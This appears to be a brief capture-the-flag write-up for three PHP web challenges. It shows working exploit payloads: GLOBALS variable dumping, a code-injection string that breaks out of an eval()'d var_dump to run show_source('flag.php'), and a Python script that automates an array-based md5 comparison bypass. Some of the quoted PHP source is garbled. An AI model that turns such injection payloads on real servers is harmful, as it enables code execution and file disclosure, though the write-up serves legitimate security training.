-
Blast-1 :
Open the link, it's 502
I add a variable to pass parameters directly behind: ?a=1
out a piece of code
In the var_dump() function, $$a is used, and the super global variable GLOBALS may be used
Pass a GLOBALS to the hello parameter
get flag
-
Blast-2 :
open link
var_dump() will return the type and value of the data variable
eval() will treat the string as php code
There are two ways to get the flag
1:?hello=file('flag.php')
2:?hello=);show_source('flag.php');var_dump(
-
Blast-3 :
Open the link, or php code
<?php error_reporting(0); session_start(); require('./flag.php'); if(!isset($_SESSION['nums'])){ $_SESSION['nums'] = 0; $_SESSION['time'] = time(); $_SESSION['whoami'] = 'ea'; } if($_SESSION['time']+120<time()){ session_destroy(); } $value = $_REQUEST['value']; $str_rand = range('a', 'z'); $ str_rands = $ str_rand [mt_rand (0.25)]. $ str_rand [mt_rand (0.25)]; if($_SESSION['whoami']==($value[0].$value[1]) && substr(md5($value),5,4)==0){ $_SESSION['nums']++; $_SESSION['whoami'] = $str_rands; echo $ str_rands; } if($_SESSION['nums']>=10){ echo $flag; } show_source(__FILE__); ?>
Key points:
The value of the variable str_rand is 2 lowercase letters
If the value of the whoami parameter in SESSIONS is equal to the value of the parameter value, and the 5th bit of the variable value processed by the md5() function is equal to 0 and the next 4 bits are equal to 0, nums will increase by 1, and the value of whoami will also be updated. If nums is greater than 10, you can get the flag
Arrays can bypass this judgment of md5, because the md5() function will return null when processing an array, null==0
The first parameter is passed, ?value[]=ea
The second parameter is passed, ?value[]=mj, and so on
You can write a python script to run it
import requests s = requests.session() strs = ['abcdefghijklmnopqrstuvwxyz'] url = "http://b9998c89f8054c61b75dcf6d48d1d164707c9299b7f949f4.game.ichunqiu.com/?value[]=ea" r = s.get(url) for i in range(10): url_1 = "http://b9998c89f8054c61b75dcf6d48d1d164707c9299b7f949f4.game.ichunqiu.com/?value[]=" + r.text[:2] r = s.get(url_1) print(r.url) if 'flag{' in r.text: print(r.text)
operation result
get flag